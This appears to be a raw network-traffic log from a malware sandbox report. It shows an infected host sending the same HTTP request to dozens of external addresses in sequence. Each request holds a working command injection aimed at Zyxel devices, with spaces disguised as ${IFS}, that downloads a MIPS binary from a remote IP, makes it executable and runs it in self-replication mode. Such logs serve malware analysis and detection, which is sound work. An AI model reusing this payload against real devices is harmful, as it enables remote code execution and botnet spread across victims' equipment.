                                                Jan 29, 2024 07:07:40.153273106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2396192.168.2.233574665.87.139.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153291941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2397192.168.2.2341590189.86.88.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153328896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2398192.168.2.234289244.162.110.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153362036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2399192.168.2.2352914160.17.236.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153420925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2400192.168.2.235156481.201.161.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153480053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2401192.168.2.2338530221.165.133.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153526068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2402192.168.2.2354992141.188.125.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153553009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2403192.168.2.2348206123.113.221.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153583050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2404192.168.2.2360586131.125.123.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153616905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2405192.168.2.2360124206.26.186.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153655052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2406192.168.2.2338600139.145.82.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153706074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2407192.168.2.233643085.153.158.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153729916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2408192.168.2.2340538213.110.165.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153764963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2409192.168.2.236045240.105.67.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153800011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2410192.168.2.2354638110.84.31.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153820038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2411192.168.2.2334178132.131.15.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153856039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2412192.168.2.2343620137.239.37.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153904915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2413192.168.2.235692423.240.213.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153940916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2414192.168.2.2352000132.187.1.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.153978109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2415192.168.2.234179065.26.137.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154026031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2416192.168.2.235264472.164.143.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154053926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2417192.168.2.236078693.185.251.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154098988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2418192.168.2.234616875.9.16.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154124022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2419192.168.2.234433036.26.124.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154155970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2420192.168.2.2345864185.110.120.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154200077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2421192.168.2.234623889.142.139.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154239893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2422192.168.2.2352030212.211.61.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154283047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2423192.168.2.234997273.178.217.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154297113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2424192.168.2.2335056189.66.51.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154347897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2425192.168.2.2340420165.62.204.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154381990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2426192.168.2.234692491.216.180.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154417992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2427192.168.2.235101444.82.41.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154439926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2428192.168.2.235470819.250.155.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154501915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2429192.168.2.235422837.203.192.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154541969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2430192.168.2.2337420162.129.214.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154578924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2431192.168.2.2356994188.229.157.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154613018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2432192.168.2.235306891.159.240.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154644966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2433192.168.2.2360332107.61.241.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154685020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2434192.168.2.233837495.219.127.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154730082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2435192.168.2.23339882.1.237.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154756069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2436192.168.2.2357784130.121.132.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154798985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2437192.168.2.2357326120.136.113.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154822111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2438192.168.2.2360696130.153.187.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154897928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2439192.168.2.2340662143.253.200.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.154993057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2440192.168.2.2346444131.50.228.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155026913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2441192.168.2.2351774212.1.84.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155064106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2442192.168.2.233379836.53.186.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155103922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2443192.168.2.2334308105.3.64.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155138969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2444192.168.2.2347826205.195.114.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155174017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2445192.168.2.235580288.126.41.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155193090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2446192.168.2.2342306140.27.217.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155251980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2447192.168.2.2360310140.221.237.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155318975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2448192.168.2.2347760161.12.22.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155343056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2449192.168.2.2348902125.14.32.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155399084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2450192.168.2.2358562167.151.79.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155427933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2451192.168.2.2345228163.172.212.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.155472994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2452192.168.2.2352214205.152.156.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.156460047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2453192.168.2.235714619.112.48.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.156763077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2454192.168.2.233789445.237.162.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.157906055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2455192.168.2.2351690123.74.150.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.158011913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2456192.168.2.233726851.79.30.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.158366919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2457192.168.2.2355186110.80.145.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.158936977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2458192.168.2.23539408.43.126.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.158989906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2459192.168.2.235082041.19.208.62443
                                                TimestampBytes transferredDirectionData
